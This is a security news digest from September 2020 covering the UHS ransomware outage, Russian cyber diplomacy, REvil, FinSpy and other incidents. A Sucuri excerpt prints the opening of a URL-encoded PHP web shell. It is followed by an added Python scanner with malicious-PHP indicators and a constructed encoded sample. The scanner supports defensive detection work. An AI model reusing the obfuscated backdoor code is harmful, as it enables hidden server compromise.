Security daily (28-09-2020)

US medical provider UHS blames 'security issue' for major outage

Computer networks at Universal Health Services, which describes itself as one of the largest health care providers in the U.S., were down Monday due to what the company described as “an IT security issue.” Multiple media outlets, including NBC News, suggested UHS’s IT network had been hit by ransomware and that some nurses had reverted to pen and paper. In a statement, UHS, which says it oversees 400 hospitals, did not address whether the company had suffered a ransomware attack. A company spokesperson did not respond to multiple requests for comment. “Patient care continues to be delivered safely and effectively” and “no patient data appears to be compromised,” the UHS statement said. It’s the latest in a series of cybersecurity incidents to affect health care facilities during the coronavirus pandemic. The most serious occurred this month when a patient in Germany died after being turned away from a hospital that was hit […] (CyberScoop)

Weeks before Election Day, Putin trolls the US with an offer for cyber truce

Add the prefix “cyber” to any concept common in geopolitics — diplomacy, norms and so on — and the resulting phrase immediately becomes less precise than its parts. The latest example is “truce,” courtesy of none other than Russian President Vladimir Putin. Putin didn’t use “cyber truce” in a statement Friday that called for the U.S. and Russia to create “a comprehensive program of practical measures to reboot our relations in the field of security in the use of information and communication technologies (ICTs).” But the term fits. The former KGB agent’s proposal was otherwise broad and vague. He mentioned nothing about Russia’s well-documented misdeeds in cyberspace, and he made no accusations about what the U.S. might be doing in response. The White House dismissed Putin’s proposal in a statement to the New York Times, and Russia-watchers expressed the usual caution. Russia is interfering in our elections today, at this moment, […] (CyberScoop)

REvil ransomware crew dangles $1,000,000 cybercrime carrot

When a company pays a multimillion dollar ransomware blackmail demand, where do you think the money goes? (Naked Security)

Naked Security Live – “SMS scams: keep yourself and your family safe!”

Naked Security Live - here's the recorded version of our latest video. Enjoy. (Naked Security)

Hack Lets You Track The International Space Station With An NES

(News ≈ Packet Storm)

Feds Warn Disinformation Will Be Spamming US Voters

(News ≈ Packet Storm)

Airbnb Bug Let You Read Other People's Account Messages

(News ≈ Packet Storm)

UHS Hospital Network Hit By Ransomware Attack

(News ≈ Packet Storm)

Backdoor Obfuscation: tempnam & URL Encoding

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code. During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.

This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL-encoded format and assigned to the variable $i: <?php $i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm ... (Sucuri Blog)
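As an added defensive example (not code from the Sucuri post), the following Python scanner finds rawurldecode()/urldecode() calls in PHP source whose string argument is mostly percent-encoded, decodes it and reports when the result looks like PHP code rather than data. The sample PHP file it scans is constructed here, and the length/ratio thresholds and indicator list are assumptions.

```python
"""Flag rawurldecode()/urldecode() calls whose string literal is mostly
percent-encoded and decodes to PHP code (added example, not Sucuri's code)."""
import re
from urllib.parse import unquote

ENCODED_CALL = re.compile(  # rawurldecode("...") / urldecode("...") around a quoted literal
    r"""\b(rawurldecode|urldecode)\s*\(\s*(["'])([^"']+)\2\s*\)"""
)
# Strings that indicate the decoded payload is PHP code, not ordinary data (assumed list)
INDICATORS = ("<?php", "eval(", "set_time_limit(", "error_reporting(",
              "$_POST", "$_GET", "base64_decode(", "system(")

def percent_ratio(literal: str) -> float:
    """Fraction of the literal made up of %XX escapes."""
    escapes = len(re.findall(r"%[0-9A-Fa-f]{2}", literal))
    return escapes * 3 / len(literal) if literal else 0.0

def scan_php_source(src: str, min_len: int = 40, min_ratio: float = 0.3):
    """Return one finding per suspicious decode call in a PHP source string."""
    findings = []
    for m in ENCODED_CALL.finditer(src):
        func, _, literal = m.groups()
        # Short literals and mostly-plain URLs are normal uses of the function
        if len(literal) < min_len or percent_ratio(literal) < min_ratio:
            continue
        decoded = unquote(literal)
        hits = [s for s in INDICATORS if s in decoded]
        if not hits:
            continue
        findings.append({
            "function": func,
            "line": src.count("\n", 0, m.start()) + 1,
            "encoded_ratio": round(percent_ratio(literal), 2),
            "indicators": hits,
            "decoded_preview": decoded[:80],
        })
    return findings

# Constructed sample PHP file: two legitimate decodes and one hidden PHP payload
CONSTRUCTED_SAMPLE = (
    "<?php\n"
    '$title = rawurldecode("Hello%20World");\n'
    '$u = rawurldecode("https://example.com/path/to/some/long/resource%20name/with/spaces");\n'
    '$i = rawurldecode("%3C%3Fphp%20set_time_limit%280%29%3Berror_reporting%280%29%3B'
    '%24k%3D%24_POST%5B%27k%27%5D%3B%3F%3E");\n'
)

if __name__ == "__main__":
    for f in scan_php_source(CONSTRUCTED_SAMPLE):
        print(f"line {f['line']}: {f['function']} {f['indicators']} -> {f['decoded_preview']!r}")
```

Only the third call is reported; the greeting and the long URL fall under the length or encoding-ratio thresholds and are left alone.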

Researchers Uncover Cyber Espionage Operation Aimed At Indian Army

Cybersecurity researchers uncovered fresh evidence of an ongoing cyberespionage campaign against Indian defense units and armed forces personnel at least since 2019 with an aim to steal sensitive information. Dubbed "Operation SideCopy" by Indian cybersecurity firm Quick Heal, the attacks have been attributed to an advanced persistent threat (APT) group that has successfully managed to stay (The Hacker News)

Red Team — Automation or Simulation?

What is the difference between a penetration test and a red team exercise? The common understanding is that a red team exercise is a pen-test on steroids, but what does that mean? While both programs are performed by ethical hackers, whether they are in-house residents or contracted externally, the difference runs deeper. In a nutshell, a pen-test is performed to discover exploitable (The Hacker News)

Windows 7 ‘Upgrade’ Emails Steal Outlook Credentials

Researchers warn of emails pretending to help business employees upgrade to Windows 10 - and then stealing their Outlook emails and passwords. (Threatpost)

Mac, Linux Users Now Targeted by FinSpy Variants

FinSpy has returned in new campaigns targeting dissident organizations in Egypt - and researchers uncovered new samples of the spyware targeting macOS and Linux users. (Threatpost)

Universal Health Services Ransomware Attack Impacts Hospitals Nationwide

The Ryuk ransomware is suspected to be the culprit. (Threatpost)

Joker Trojans Flood the Android Ecosystem

September saw dozens of Joker malware variants hitting Google Play and third-party app stores. (Threatpost)

Twitter Warns Developers of API Bug That Exposed App Keys, Tokens

Twitter has fixed a caching issue that could have exposed developers' API keys and tokens. (Threatpost)


/security-daily/ 29-09-2020 23:44:27